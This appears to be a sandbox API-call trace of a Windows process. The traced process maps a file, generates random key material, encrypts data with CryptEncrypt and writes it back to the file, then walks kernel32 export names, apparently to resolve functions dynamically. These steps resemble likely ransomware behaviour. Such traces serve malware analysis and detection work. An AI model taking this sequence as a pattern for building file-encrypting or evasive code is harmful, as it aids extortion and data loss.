GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=67597) returned 1 [0086.244] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0086.244] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0086.244] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0086.245] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0086.245] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0086.245] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0086.245] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0086.246] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.247] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0086.247] CloseHandle (hObject=0x43c) returned 1 [0086.247] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.247] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0086.248] CloseHandle (hObject=0x0) returned 0 [0086.248] CloseHandle (hObject=0x438) returned 1 [0086.249] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.249] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.249] GetTickCount () returned 0x114e042 [0086.249] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0086.249] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0086.249] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0086.250] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0086.250] lstrlenA (lpString="kernel32.dll") returned 12 [0086.250] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0086.250] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0086.250] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0086.250] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0086.250] lstrlenA (lpString="ADDATOMA") returned 8 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0086.250] lstrlenA (lpString="ADDATOMW") returned 8 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0086.250] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0086.250] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0086.250] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0086.250] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0086.250] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0086.251] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0086.251] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0086.251] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0086.251] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0086.251] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0086.251] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0086.251] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0086.251] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0086.251] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0086.251] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0086.251] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0086.251] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0086.251] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0086.251] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0086.251] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0086.251] lstrlenA (lpString="BACKUPREAD") returned 10 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0086.251] lstrlenA (lpString="BACKUPSEEK") returned 10 [0086.251] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0086.251] lstrlenA (lpString="BACKUPWRITE") returned 11 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0086.252] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0086.252] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0086.252] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0086.252] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0086.252] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0086.252] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0086.252] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0086.252] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0086.252] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0086.252] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0086.252] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0086.252] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0086.252] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0086.252] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0086.252] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0086.252] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0086.252] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0086.252] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0086.252] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0086.253] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0086.253] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0086.253] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0086.253] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0086.253] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0086.253] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0086.253] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0086.253] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0086.253] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0086.253] lstrlenA (lpString="BEEP") returned 4 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0086.253] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0086.253] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0086.253] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0086.253] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0086.253] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0086.253] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0086.253] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0086.253] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0086.253] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0086.254] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0086.254] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0086.254] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0086.255] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0086.255] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0086.255] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0086.255] lstrlenA (lpString="CANCELIO") returned 8 [0086.255] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0086.255] lstrlenA (lpString="CANCELIOEX") returned 10 [0086.255] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0086.255] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0086.256] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0086.256] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0086.256] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0086.256] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0086.256] lstrlenA (lpString="CHECKELEVATION") returned 14 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0086.256] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0086.256] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0086.256] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0086.256] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0086.256] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0086.256] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0086.256] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0086.256] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0086.256] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0086.256] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0086.256] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0086.256] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0086.257] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0086.257] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0086.257] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0086.257] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0086.257] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0086.257] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0086.257] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0086.257] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0086.257] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0086.257] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0086.257] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0086.257] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0086.257] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0086.257] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0086.258] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0086.258] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0086.258] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0086.258] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0086.258] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0086.258] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0086.258] lstrlenA 